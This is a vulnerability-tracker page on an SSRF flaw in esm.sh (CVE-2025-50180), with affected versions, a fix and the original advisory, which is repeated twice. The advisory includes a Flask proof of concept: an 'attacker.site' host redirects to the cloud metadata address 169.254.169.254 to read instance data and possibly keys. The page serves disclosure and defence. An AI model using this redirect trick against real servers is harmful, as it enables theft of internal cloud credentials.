Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
8.7
esm.sh Allows Access to Internal Websites
CVE-2025-50180
GHSA-3c9r-837r-qqm4
Summary
A vulnerability in esm.sh allows attackers to retrieve information from internal websites. This could lead to unauthorized access to sensitive data. To fix this, update esm.sh to the latest version or use a secure configuration to restrict access to internal websites.
What to do
- Update github.com esm-dev to version 0.0.0-20250616164159-0593516c4cfa.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| github.com | esm-dev | <= 0.0.0-20250616164159-0593516c4cfa | 0.0.0-20250616164159-0593516c4cfa |
| esm | esm.sh | <= 137 | – |
Original title
esm.sh is vulnerable to full-response SSRF
Original description
### Summary
esh.sh is vulnerable to a full-response SSRF, allowing an attacker to retrieve information from internal websites through the vulnerability.
### Details
Vulnerable code location: https://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/server/router.go#L511
If the internal address has a suffix listed below, the attacker can obtain content from the specified internal address.
eg: https://esm.sh/https://local.site/test.md
```
".js", ".ts", ".mjs", ".mts", ".jsx", ".tsx", ".cjs", ".cts", ".vue", ".svelte", ".md", ".css"
```
A 302 redirect can be used to bypass the suffix restriction.
eg: https://esm.sh/https://attacker.site/test.md
https://attacker.site/test.md 302 redirect to http://169.254.169.254/v1.json
### PoC
Use Flask to start a server that returns a 302 redirect.
```python
from flask import Flask, redirect
app = Flask(__name__)
@app.route('/test.md')
def redirect_test():
return redirect("http://169.254.169.254/v1.json", code=302)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80)
```
Let esh.sh visit this site.
https://esm.sh/https://attacker.site/test.md
Attacker can obtain data from http://169.254.169.254/v1.json.
```
var t=`<p>{"bgp":{"ipv4":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""},"ipv6":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""}},"hostname":"****","instance-v2-id":"****","instanceid":"****","interfaces":[{"ipv4":{"additional":[],"address":"****","gateway":"****","netmask":"****","routes":[{"netmask":32,"network":"****"}]},"ipv6":{"additional":[],"address":"****","network":"****","prefix":"64"},"mac":"****","network-type":"public"}],"nvidia-driver":[],"public-keys":["****"],"region":{"countrycode":"US","regioncode":"SJC"},"tags":[]}</p>
`,o={},u=t;export{u as default,t as html,o as meta};
```
Decode the data (redacted) .
```json
{"bgp":{"ipv4":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""},"ipv6":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""}},"hostname":"****","instance-v2-id":"****","instanceid":"****","interfaces":[{"ipv4":{"additional":[],"address":"****","gateway":"****","netmask":"****","routes":[{"netmask":32,"network":"****"}]},"ipv6":{"additional":[],"address":"****","network":"****","prefix":"64"},"mac":"****","network-type":"public"}],"nvidia-driver":[],"public-keys":["****"],"region":{"countrycode":"US","regioncode":"SJC"},"tags":[]}
```
### Impact
An attacker can exploit the vulnerability to access internal sites, and in a cloud environment, can retrieve access keys (AK) and secret keys (SK) by accessing the metadata service address.
### Fix
It is recommended to use `safeurl.Client` as a replacement for `http.Client`.
https://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/internal/fetch/fetch.go#L13
https://github.com/doyensec/safeurl
esh.sh is vulnerable to a full-response SSRF, allowing an attacker to retrieve information from internal websites through the vulnerability.
### Details
Vulnerable code location: https://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/server/router.go#L511
If the internal address has a suffix listed below, the attacker can obtain content from the specified internal address.
eg: https://esm.sh/https://local.site/test.md
```
".js", ".ts", ".mjs", ".mts", ".jsx", ".tsx", ".cjs", ".cts", ".vue", ".svelte", ".md", ".css"
```
A 302 redirect can be used to bypass the suffix restriction.
eg: https://esm.sh/https://attacker.site/test.md
https://attacker.site/test.md 302 redirect to http://169.254.169.254/v1.json
### PoC
Use Flask to start a server that returns a 302 redirect.
```python
from flask import Flask, redirect
app = Flask(__name__)
@app.route('/test.md')
def redirect_test():
return redirect("http://169.254.169.254/v1.json", code=302)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80)
```
Let esh.sh visit this site.
https://esm.sh/https://attacker.site/test.md
Attacker can obtain data from http://169.254.169.254/v1.json.
```
var t=`<p>{"bgp":{"ipv4":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""},"ipv6":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""}},"hostname":"****","instance-v2-id":"****","instanceid":"****","interfaces":[{"ipv4":{"additional":[],"address":"****","gateway":"****","netmask":"****","routes":[{"netmask":32,"network":"****"}]},"ipv6":{"additional":[],"address":"****","network":"****","prefix":"64"},"mac":"****","network-type":"public"}],"nvidia-driver":[],"public-keys":["****"],"region":{"countrycode":"US","regioncode":"SJC"},"tags":[]}</p>
`,o={},u=t;export{u as default,t as html,o as meta};
```
Decode the data (redacted) .
```json
{"bgp":{"ipv4":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""},"ipv6":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""}},"hostname":"****","instance-v2-id":"****","instanceid":"****","interfaces":[{"ipv4":{"additional":[],"address":"****","gateway":"****","netmask":"****","routes":[{"netmask":32,"network":"****"}]},"ipv6":{"additional":[],"address":"****","network":"****","prefix":"64"},"mac":"****","network-type":"public"}],"nvidia-driver":[],"public-keys":["****"],"region":{"countrycode":"US","regioncode":"SJC"},"tags":[]}
```
### Impact
An attacker can exploit the vulnerability to access internal sites, and in a cloud environment, can retrieve access keys (AK) and secret keys (SK) by accessing the metadata service address.
### Fix
It is recommended to use `safeurl.Client` as a replacement for `http.Client`.
https://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/internal/fetch/fetch.go#L13
https://github.com/doyensec/safeurl
nvd CVSS3.1
7.5
nvd CVSS4.0
8.7
Vulnerability type
CWE-918
Server-Side Request Forgery (SSRF)
- https://nvd.nist.gov/vuln/detail/CVE-2025-50180
- https://github.com/advisories/GHSA-3c9r-837r-qqm4
- https://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/... Patch
- https://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/... Patch
- https://github.com/esm-dev/esm.sh/commit/0593516c4cfab49ad3b4900416a8432ff2e23eb... Patch
- https://github.com/esm-dev/esm.sh/pull/1149 Issue Tracking Patch
- https://github.com/esm-dev/esm.sh/releases/tag/v137 Product Release Notes
- https://github.com/esm-dev/esm.sh/security/advisories/GHSA-3c9r-837r-qqm4 Exploit Mitigation Patch Vendor Advisory
Published: 25 Feb 2026 · Updated: 12 Mar 2026 · First seen: 6 Mar 2026